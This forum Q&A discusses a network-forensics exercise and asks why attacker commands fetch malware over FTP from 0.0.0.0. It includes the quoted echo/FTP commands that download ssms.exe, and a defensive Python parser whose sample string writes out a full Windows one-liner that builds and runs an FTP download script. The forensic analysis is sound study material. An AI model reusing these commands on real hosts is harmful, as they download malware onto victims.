
Working through this exercise in network forensics, the attacker used a buffer overflow exploit to send commands to the victim's command prompt. The commands open an FTP session and download some malware. I'm confused about why it works with the IP address 0.0.0.0. The packets show the attacker binds a shell on the victim's host and uses FTP to force it to download an executable.

The commands are:

echo open 0.0.0.0 8884
echo user 1 1
echo get ssms.exe

My question is, how would they get anywhere using the IP address 0.0.0.0? Is the bound shell somehow associated with / "in" the attacker's network while the exploit is going on, so that 0.0.0.0 resolves to localhost on the attacker's machine?

Some of the answers used the presence of this IP address to prove that the victim was a honeypot because it accepted any IP address the attacker gave them and downloaded the exe as told. Still, how would 0.0.0.0 get anywhere? Also, wouldn't this be a nice way for an attacker to know they have hacked into a honeypot?

One answer (PDF) gives a good write-up of the exploit but does not specifically address this question. Another answer (PDF) thinks the 0.0.0.0 might be an error, so I am confused.

mcgyver5

1 Answer


In the Internet Protocol Version 4, the address 0.0.0.0 is a non-routable meta-address used to designate an invalid, unknown or non-applicable target. To give a special meaning to an otherwise invalid piece of data is an application of in-band signaling.

In the context of servers, 0.0.0.0 means "all IPv4 addresses on the local machine". If a host has two IP addresses, 192.168.1.1 and 10.1.2.1, and a server running on the host listens on 0.0.0.0, it will be reachable at both of those IPs.

In the context of routing, 0.0.0.0 usually means the default route, i.e. the route which leads to "the rest of" the internet instead of somewhere on the local network.

Wikipedia Article on 0.0.0.0

If I were to guess, as I have not done the challenge, but based off of the first link provided the exploit went something like this:

  1. Exploit CVE-2003-0533 - shellcode to bind port TCP 1957 as a shell. (maybe the attacker knew this port wasn't blocked by a firewall?)
  2. Commands executed from the shell to set up a reverse ftp connection to himself (in this case), exposing this to the host via port 8884. Since the computer could have multiple IPs, 0.0.0.0 is a way to say "whatever interface the reverse connection worked on would accept this connection." A reverse connection may aid in bypassing firewall rules.
  3. FTP server is located on the other end of this tunnel, the commands that were executed logged into the ftp and downloaded the malware to the victim's PC for later execution.
  • I see what I missed. A shell was already open to the attacker's machine, so the 0.0.0.0 was used locally to the attacker, just as if I had logged into a remote host with ssh and typed ftp 0.0.0.0 etc... – mcgyver5 Aug 26 '15 at 14:43
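As an added example (my code, not from the question or the answer), here is a small Python parser that pulls the server, port, credentials and requested file out of echoed FTP commands like the ones in the question and classifies the target address with the standard library's ipaddress module, so 0.0.0.0 stands out as an unspecified, non-routable target. The concatenated sample line and the trailing `ftp -n -s:o` invocation are constructed assumptions about how such a script is driven from a Windows shell.

```python
"""Classify scripted FTP commands recovered from a capture (added example)."""
import ipaddress
import re

# Constructed sample: the three echoed commands from the question, joined the
# way a one-line Windows shell payload would chain them (assumption: '&' and a
# final 'ftp -n -s:o' to run the script file 'o').
SAMPLE = ("echo open 0.0.0.0 8884 > o&echo user 1 1 >> o"
          "&echo get ssms.exe >> o&echo quit >> o&ftp -n -s:o")

OPEN_RE = re.compile(r"echo\s+open\s+(\S+)\s+(\d+)")
USER_RE = re.compile(r"echo\s+user\s+(\S+)\s+(\S+)")
GET_RE = re.compile(r"echo\s+get\s+(\S+)")


def classify_target(host):
    """Say where an FTP 'open <host>' would actually lead."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return "hostname"  # would need DNS; not the case in this exercise
    if ip.is_unspecified:
        return "unspecified"  # 0.0.0.0: non-routable, only the local host
    if ip.is_loopback:
        return "loopback"
    if ip.is_private:
        return "private"
    return "global" if ip.is_global else "other"


def parse_ftp_script(payload):
    """Extract host, port, credentials, files and the target class."""
    info = {"files": GET_RE.findall(payload)}
    m = OPEN_RE.search(payload)
    if m:
        info["host"], info["port"] = m.group(1), int(m.group(2))
        info["target_class"] = classify_target(m.group(1))
    m = USER_RE.search(payload)
    if m:
        info["user"], info["password"] = m.group(1), m.group(2)
    return info


def findings(info):
    """Analyst notes: why this script is unusual and what it would fetch."""
    notes = []
    if info.get("target_class") == "unspecified":
        # 0.0.0.0 cannot reach a remote server; the transfer only succeeds
        # if something on the victim itself (or a honeypot accepting any
        # address) answers on that port.
        notes.append("target 0.0.0.0 is non-routable; only a local listener answers")
    if info.get("user") == info.get("password"):
        notes.append("throwaway credentials")
    if any(f.lower().endswith(".exe") for f in info["files"]):
        notes.append("executable retrieved: " + ", ".join(info["files"]))
    return notes
```

Running `findings(parse_ftp_script(SAMPLE))` returns three notes: the non-routable target, the throwaway credentials, and the retrieved executable.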